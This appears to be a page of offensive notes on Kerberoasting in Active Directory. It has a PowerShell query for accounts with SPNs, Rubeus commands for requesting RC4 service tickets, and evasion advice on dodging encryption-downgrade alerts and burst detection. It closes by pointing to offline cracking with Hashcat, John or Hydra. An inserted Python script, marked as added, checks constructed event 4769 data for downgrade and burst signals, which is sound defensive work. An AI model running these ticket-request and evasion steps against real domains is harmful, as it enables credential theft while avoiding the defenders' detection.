Kerberoasting
Look for user accounts that are used as service accounts and have an SPN set.
Since Kerberoasting relies on password cracking, we don't look for machine accounts, as they usually have strong passwords that would make cracking them difficult or unsuccessful.
{% code title="PowerShell AD Module" %}
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
{% endcode %}
Our chances of cracking AES128/AES256 tickets are low, and requesting RC4-encrypted tickets for user accounts that support AES would trigger an Encryption Downgrade alert.
Good practice is to look for accounts that only support RC4_HMAC, to possibly avoid detection.
{% code title="Rubeus.exe" %}
Rubeus.exe kerberoast /stats /simple /rc4opsec
{% endcode %}
Requesting many different TGSs in rapid succession is seen as anomalous behaviour and could be detected, so it is better to avoid kerberoasting all accounts at once.
Insecure:
{% code title="Rubeus.exe" %}
Rubeus.exe kerberoast /rc4opsec /outfile:<path_to_file>
{% endcode %}
More secure:
{% code title="Rubeus.exe" %}
Rubeus.exe kerberoast /user:<SamAccountName> /simple /rc4opsec
{% endcode %}
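The two detection signals mentioned above (RC4 tickets requested for AES-capable accounts, and bursts of TGS requests from one account) written as checks over Windows Security event 4769 records. This is an added example, not part of the original notes; the event records and the AES_CAPABLE map are constructed, and a real deployment would read them from the Security log and from each account's msDS-SupportedEncryptionTypes.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Windows Security event 4769 (service ticket requested)
# records: (time, requesting account, service name, Ticket Encryption Type).
# 0x17 is RC4-HMAC, 0x12 is AES256; real logs carry more fields.
SAMPLE_4769 = [
    ("2024-05-01T09:00:01", "jdoe", "svc_sql", "0x17"),
    ("2024-05-01T09:00:02", "jdoe", "svc_web", "0x17"),
    ("2024-05-01T09:00:02", "jdoe", "svc_backup", "0x17"),
    ("2024-05-01T09:00:03", "jdoe", "svc_mail", "0x17"),
    ("2024-05-01T09:00:03", "jdoe", "svc_ldap", "0x17"),
    ("2024-05-01T09:05:00", "asmith", "svc_sql", "0x12"),
    ("2024-05-01T10:30:00", "asmith", "svc_web", "0x17"),
]
# Constructed: does each service account's msDS-SupportedEncryptionTypes allow AES?
AES_CAPABLE = {"svc_sql": True, "svc_web": False, "svc_backup": True,
               "svc_mail": True, "svc_ldap": False}
RC4_HMAC = "0x17"

def rc4_for_aes_capable(events, aes_capable):
    """Encryption downgrade: an RC4 ticket was issued for a service that
    supports AES, so the client asked for the weaker type on purpose.
    An RC4 ticket for an RC4-only account is normal and is not flagged."""
    return [(acct, svc) for _, acct, svc, etype in events
            if etype == RC4_HMAC and aes_capable.get(svc, False)]

def tgs_bursts(events, window_seconds=60, threshold=5):
    """Accounts that requested tickets for >= threshold distinct services
    inside any sliding window of window_seconds (mass-kerberoast pattern).
    Returns {account: distinct services seen in the first such window}."""
    window = timedelta(seconds=window_seconds)
    by_account = defaultdict(list)
    for ts, acct, svc, _ in events:
        by_account[acct].append((datetime.fromisoformat(ts), svc))
    flagged = {}
    for acct, reqs in by_account.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            services = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(services) >= threshold:
                flagged[acct] = len(services)
                break
    return flagged

if __name__ == "__main__":
    print("RC4 tickets for AES-capable services:",
          rc4_for_aes_capable(SAMPLE_4769, AES_CAPABLE))
    print("Burst requesters:", tgs_bursts(SAMPLE_4769))
```

The burst threshold and window are tuning knobs; the per-user `/user:` request pattern on this page produces one 4769 per target and so only shows up under the downgrade check.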
We can now feed the hash to John the Ripper or Hashcat for a dictionary attack, or to Hydra for brute-forcing.